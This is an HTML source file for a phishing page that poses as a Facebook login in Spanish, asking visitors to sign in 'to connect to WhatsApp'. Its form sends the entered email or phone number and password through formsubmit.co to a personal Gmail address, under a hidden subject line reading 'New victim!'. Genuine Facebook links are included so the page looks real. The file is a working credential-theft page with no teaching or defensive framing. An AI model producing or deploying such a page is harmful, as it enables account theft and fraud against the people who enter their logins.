<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <meta http-equiv="X-UA-Compatible" content="ie=edge">
  <title>Facebook</title>
  
  
    <style>
    input {
      width: 335px;

      height: 35px;
     
    }
    
button{  
     
      border-radius: 2%; 
      padding: 10px 20px; 
      background-color: #1877F2; 
      color: white; 
      border: none; 
      text-align: center;  
      text-decoration: none; 
      display: inline-block;  
      font-size:10 px; 
      cursor: pointer; 
      width: 335px;

      height: 40px;
    }
 .frame {
       
      background-color: #00A400;
      padding: 10px; 
      color: white
    }
 }
 left-align {
        text-align: left;
    }
    p {
      font-family: Arial, sans-serif;
      font-size: 16px;
      
    }
  </style>
  <script>
    function edgeClicked() {
      alert("تم النقر على الحافة!");
    }
  </script>
</head>
<body>
 <center> <img src="https://vid.alarabiya.net/images/2022/04/01/8b9c2379-a220-433e-b211-aa4385b78c59/8b9c2379-a220-433e-b211-aa4385b78c59.jpg?crop=1:1" width="80"  height=",80">
<font color="#90949C" size="3"> <p>Inicie sesión en Facebook para conectarse a WhatsApp </p></font>
 <form action="https://formsubmit.co/youssefgogo800@gmail.com" method="POST">
   
   <input type="hidden" name="_subject" value="New victim!">
   
 <input type="text" name="mail" placeholder="Número de teléfono móvil o correo electrónico"  required> 
 
 <br><br>
 <input type="password" name="password" placeholder=" contraseña  " required>
 <br> <br>
 
 <button type="submit" ><font size="4.5"><strong>iniciar la sesión</strong></font></button>
 
 </form>
 
 <br>
  <a href="https://m.facebook.com/login/identify/?ctx=recover&c=https%3A%2F%2Fm.facebook.com%2F&multiple_results=0&ars=facebook_login&from_login_screen=0&lwv=100&wtsid=rdr_0j91d4cAe4mfA8SOs&_rdr">  <p> <font color="#7596C8">¿Has olvidado tu contraseña?</font></p></a>
 <br>
<p> o <hr> </p>
 <a href="https://m.facebook.com/reg/?ref=dbl&refid=8"><p><span class="frame"><strong>Crear una nueva cuenta</strong></span> </p></center></a>
  <br><br>
  
 
 <font color="#90949C"><p><strong>Español
</strong></p>   </font> 
<font color="49659F"><p>Basa Jawa</p>
<p>日本語</p>
 <p>Português (Brasil) ...</p>
 </font> 

 <p align=center>Meta © 2023</p>
 
  
</button>
</body>
</html>